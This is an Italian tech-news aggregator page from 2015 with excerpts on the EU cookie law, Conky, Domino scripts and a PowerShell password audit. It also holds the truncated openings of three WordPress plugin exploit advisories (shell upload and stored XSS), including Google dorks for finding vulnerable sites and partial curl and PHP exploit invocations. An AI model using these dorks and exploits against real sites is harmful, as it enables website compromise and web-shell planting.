I migliori script e plugins per adeguarsi alla legge sui cookie

26 maggio 2015 - Fonte: http://www.digitalking.it

Cookie law

Il 2 giugno 2015 anche in Italia entrano in vigore i nuovi adempimenti previsti dalla normativa europea sui cookie.

Ma quali sono questi adempimenti da rispettare?

– aver predisposto e mostrato all’utente un banner informativo
– aver predisposto e mostrato all’utente una cookie policy
– aver richiesto il consenso agli utenti

Esistono delle eccezioni, per approfondimenti sulla cookie law si rimanda all’ottimo post di Iubenda che, oltre a fornire informazioni chiare e precise a riguardo, mette a disposizione gratuitamente un ottimo kit per generare...

Leggi il seguito »

Conky: monitor di sistema sempre sul desktop linux

20 maggio 2015 - Fonte: http://www.consulentiit.it
Conky è frutto di un ottimo progetto ed è essenziale per monitorare vari aspetti del sistema come: l’uso della CPU, dello stato dei dischi, dei processi attivi, della RAM, la temperatura della motherboard e molte altre funzionalità. Conky si pone sul desktop senza darci alcun fastidio, è infatti trasparente ed installarlo è facilissimo....

Leggi il seguito »

LightConky: script conky semplice e colorato

30 aprile 2015 - Fonte: http://www.inthebit.it
(adsbygoogle = window.adsbygoogle || []).push({});

Stavo cercando su internet un bello script per Conky… Alcuni non funzionavano e alcuni non mi piacevano… Poi ne ho trovato uno semplice che più o meno funzionava… Allora mi sono chiesto… Perchè non provare a modificare questo script?
Ci sono riuscito e volevo condividerlo con voi, anche se ripeto, è molto semplice, è il primo script che “creo” perciò critiche sono aperte :)

E’ costituito di due script nell’insieme

  • lconky-scripts/lightconkyrc1
  • lconky-scripts/lightconkyrc2
...

Leggi il seguito »

WordPress N-Media Website Contact Form 1.3.4 Shell Upload

22 aprile 2015 - Fonte: http://www.mondounix.com
######################
 
# Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability
 
# Exploit Author : Claudio Viviani
 
 
# Software Link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
 
# Date : 2015-04-1
 
# Dork Google: index of website-contact-form-with-file-upload
               index of /uploads/contact_files/
 
# Tested on : Linux BackBox 4.0 / curl 7.35.0
 
#####################
 
# Info :  
 
 The "upload_file()" ajax function is affected from unrestircted file upload vulnerability.
 
 
######################
 
# PoC:
 
 curl -k -X POST -F "action=upload"...

Leggi il seguito »

Domino script 3.0 , nuova release da Daniel Nashed !

7 aprile 2015 - Fonte: http://www.msbiro.net/
Il grande Daniel Nashed ha appena rilasciato i nuovi script di start e stop 3.0 che ora supportano correttamente anche RHEL 7 e SLES12 per cui SYSTEMD.

Su linux uso i suoi script da diversi anni e mi sono sempre trovato molto bene perchè oltre alle funzionalità base offrono alcune cose utili come l'aggancio alla console durante esecuzione, durante spegnimento e la possibilità di lanciare comandi pre e post script.

A questa pagina trovate l'annuncio della nuova release ed il link per il download, Thanks Daniel !

Daniel è un IBM Champion e vi consiglio anche ...

Leggi il seguito »

WordPress AB Google Map Travel CSRF / XSS

30 marzo 2015 - Fonte: http://www.mondounix.com
===============================================================================
CSRF/Stored XSS Vulnerability in AB Google Map Travel (AB-MAP) Wordpress Plugin 
===============================================================================
 
. contents:: Table Of Content
 
Overview
========
 
* Title :Stored XSS Vulnerability in AB Google Map Travel (AB-MAP) Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/ab-google-map-travel/
* Severity: HIGH
* Version Affected: Version 3.4  and mostly prior to it
* Version Tested : Version  3.4
* version patched: 
 
Description 
===========
 
Vulnerable Parameter  
--------------------
 
* Latitude:
* Longitude:
*...

Leggi il seguito »

Come impedire di farci copiare le immagini con il destro del mouse o con il drag & drop.

29 marzo 2015 - Fonte: http://www.ideepercomputeredinternet.com/
Premetto che un esperto di informatica può sempre trovare il modo di copiare una immagine magari andando sul sorgente pagina per poi riuscire a trovarne l'indirizzo. Però in genere chi commette furti di foto non è un grande conoscitore di internet altrimenti non rischierebbe una infrazione di questo genere che potrebbe compromettere tutto il suo lavoro visto che ci sono delle norme internazionali molto precise per combattere le violazioni di copyright.
D'altra parte gli autori di siti con immagini molto preziose come potrebbero essere gli artigiani che propongono i loro lavori, le ragazze che si occupano di make-up o di nail-art, i fotografi professionisti o anche chi abbia scattato una foto importante perché si trovava nel posto giusto al momento giusto sono da sempre...

Leggi il seguito »

Scopriamo insieme a cosa serve Automator per Mac

29 marzo 2015 - Fonte: http://www.applemobile.it

Le applicazioni native sul nostro Mac, indipendentemente dalla sua versione, sono davvero molte. Anche chi è un veterano e ha questi fedeli compagni ormai quasi da una vita non è detto che conosca ogni singola funzione. Dico ciò per dimostrare che non si smette mai di imparare avendo a che fare con il mondo Apple e soprattutto non si smette mai di apprezzare i prodotti della grande Mela.

AUTOMATOR-Mac_thumb800

Ogni giorno molti utenti Mac eseguono ripetutamente diverse attività che alle volte risultano essere molto...

Leggi il seguito »

WordPress Reflex Gallery 3.1.3 Shell Upload

21 marzo 2015 - Fonte: http://www.mondounix.com
<?php
 
/*
  # Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload
  # TIPE:          Arbitrary File Upload
  # Google DORK:   inurl:"wp-content/plugins/reflex-gallery/"
  # Vendor:        https://wordpress.org/plugins/reflex-gallery/
  # Tested on:     Linux
  # Version:       3.1.3 (Last)
  # EXECUTE:       php exploit.php www.alvo.com.br shell.php
  # OUTPUT:        Exploit_AFU.txt
  # POC            http://i.imgur.com/mpjXaZ9.png
  # REF COD        http://1337day.com/exploit/23369
 
--------------------------------------------------------------------------------
  <form method = "POST" action = "" enctype = "multipart/form-data" >
  <input type...

Leggi il seguito »

Script powershell per identificare le password di dominio “deboli”

18 marzo 2015 - Fonte: http://nazarenolatella.myblog.it

Ogni tanto fare una sorta di security audit sulla nostra rete è cosa buona e giusta, soprattutto se in passato questo task è stato totalmente ingnorato dai sistemisti di turno.

Proprio per questo motivo, ho pensato di realizzare un scrip powershell in grado di testare la robustezza delle password utilizzate dalle varie utenze di dominio.

powershellPreparazione

Per prima cosa occorre creare una lista di...

Leggi il seguito »